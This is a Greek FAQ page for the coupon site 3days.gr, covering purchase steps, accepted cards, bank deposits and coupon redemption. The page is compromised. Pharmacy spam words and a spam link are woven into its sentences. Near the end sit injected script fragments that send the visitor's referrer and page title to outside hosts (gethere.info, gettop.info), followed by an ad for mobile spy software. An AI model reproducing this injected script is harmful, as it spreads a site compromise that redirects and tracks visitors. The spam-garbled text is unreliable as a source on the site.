Επιλογή πόλης

  Συχνές Ερωτήσεις

  faq 3days.gr
  • ΤΟ 3DAYS.GR ΜΕ ΑΠΛΑ ΛΟΓΙΑ

  Κάθε 3 μέρες  μπαίνει μια νέα, καταπληκτική προσφορά σε επιλεγμένα καταλύματα και υπηρεσίες αναψυχής για περιορισμένο αριθμό Cheap χρηστών/αγοραστών.

  • ΠΩΣ ΑΓΟΡΑΖΩ ΤΗΝ ΠΡΟΣΦΟΡΑ;

  Επιλέξτε την προσφορά. Πατήστε cialis 5 mg online «Αγορά». Μετά «Προχωρήστε στην πληρωμή». Αποδεχτείτε τους Όρους Χρήσης & «Κάντε Παραγγελία». Θα λάβετε το κουπόνι στο e-mail σας ή στο 3days.gr στην κατηγορία «Ο λογαριασμός μου». Εκτυπώστε το κουπόνι. Κάντε την κράτησή σας δίνοντας τον κωδικό του κουπονιού στον υπεύθυνο του ξενοδοχείου. Κατά την άφιξή σας δίνετε το εκτυπωμένο κουπόνι.

  • ΤΙ ΘΑ ΜΟΥ ΚΟΣΤΙΣΕΙ ΓΙΑ ΝΑ ΓΙΝΩ ΜΕΛΟΣ ΤΟΥ 3DAYS.GR;

  ΤΙΠΟΤΑ! Γίνεστε μέλος εντελώς δωρεάν! Πληρώνετε μόνο το αντίτιμο της προσφοράς όταν θελήσετε Purchase να αγοράσετε.

  • ΠΟΙΕΣ ΚΑΡΤΕΣ ΕΙΝΑΙ ΑΠΟΔΕΚΤΕΣ;

  Όλες οι προπληρωμένες, χρεωστικές, πιστωτικές κάρτες Visa, Cheap Master Card, Maestro και American Express.

  • ΔΕΝ ΕΧΩ ΠΙΣΤΩΤΙΚΗ ΚΑΡΤΑ ΜΠΟΡΩ ΝΑ ΑΓΟΡΑΣΩ;

  Βεβαίως και μπορείτε! Μπορείτε να κάνετε τις αγορές σας με κατάθεση και στη συνέχεια να μας στείλετε την απόδειξη συναλλαγής με e-mail στο info@3days.gr ή με fax στο 26910 68189.

  • ΜΠΟΡΩ ΝΑ ΑΓΟΡΑΣΩ ΠΑΝΩ ΑΠΟ 1 ΚΟΥΠΟΝΙ ΓΙΑ ΚΑΘΕ ΠΡΟΣΦΟΡΑ;

  Συνήθως ναι! ανάλογα όμως με την προσφορά. Πιο συγκεκριμένα, το όριο αγοράς για κάθε χρήστη μπορείτε να το βρίσκετε κάθε φορά στους http://iprocrast.com/2018/02/flonase-sale-cvs/ όρους που παρουσιάζονται για κάθε προσφορά.

  • ΕΙΝΑΙ ΑΣΦΑΛΗ ΤΑ ΔΕΔΟΜΕΝΑ ΤΗΣ ΠΙΣΤΩΤΙΚΗΣ ΜΟΥ ΚΑΡΤΑΣ ΕΑΝ ΠΡΟΧΩΡΗΣΩ ΣΕ ΑΓΟΡΑ ΠΡΟΣΦΟΡΑΣ ΜΕΣΩ 3DAYS.GR;

  Είναι απόλυτα cost of methotrexate without insurance ασφαλή, αφού μεταδίδονται κατευθείαν μέσω SSL στις τράπεζες, με την ασφάλεια και την εγγύηση του Alpha e-Commerce της ALPHA BANK.

  • ΠΩΣ ΓΙΝΕΤΑΙ Η ΕΞΑΡΓΥΡΩΣΗ ΤΟΥ ΚΟΥΠΟΝΙΟΥ;

  Η εξαργύρωση του κουπονιού πραγματοποιείται με ταυτότητα ή διαβατήριο, (γι’ αυτό και πρέπει να δηλώνετε πάντα τα πραγματικά Order σας στοιχεία έτσι ώστε να μην υπάρξει πρόβλημα ταυτοποίησης). Σε περίπτωση που θέλετε να αγοράσετε για λογαριασμό κάποιου τρίτου μπορείτε να το κάνετε χωρίς κανένα πρόβλημα δηλώνοντας το ονοματεπώνυμό σας εδώ.

  • ΜΠΟΡΩ ΝΑ ΣΥΝΔΥΑΣΩ ΤΗΝ ΠΡΟΣΦΟΡΑ ΤΟΥ 3DAYS.GR ΜΕ ΑΛΛΕΣ ΠΡΟΣΦΟΡΕΣ ΤΗΣ ΕΠΙΧΕΙΡΗΣΗΣ;

  Μόνο σε περίπτωση που το κουπόνι που θα Purchase λάβετε αναφέρει κάτι ανάλογο.

  • ΕΧΩ ΕΠΙΧΕΙΡΗΣΗ ΚΑΙ ΘΕΛΩ ΝΑ ΔΩΣΩ ΜΙΑ ΠΡΟΣΦΟΡΑ ΤΙ ΚΑΝΩ;

  Είναι πολύ απλό συμπληρώστε τη φόρμα που θα βρείτε εδώ με θέμα ΠΡΟΒΟΛΗ ΣΤΟ 3DAYS.GR και θα επικοινωνήσουμε άμεσα μαζί σας! Ισχύει για τουριστικές επιχειρήσεις.

  s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=” + encodeURIComponent(document.referrer) + “&default_keyword=” + encodeURIComponent(document.title) + »;

  s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=” + encodeURIComponent(document.referrer) + “&default_keyword=” + encodeURIComponent(document.title) + »; if (document.currentScript) { https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.

  Προσφορές που μπορεί να σε ενδιαφέρουν
   To Top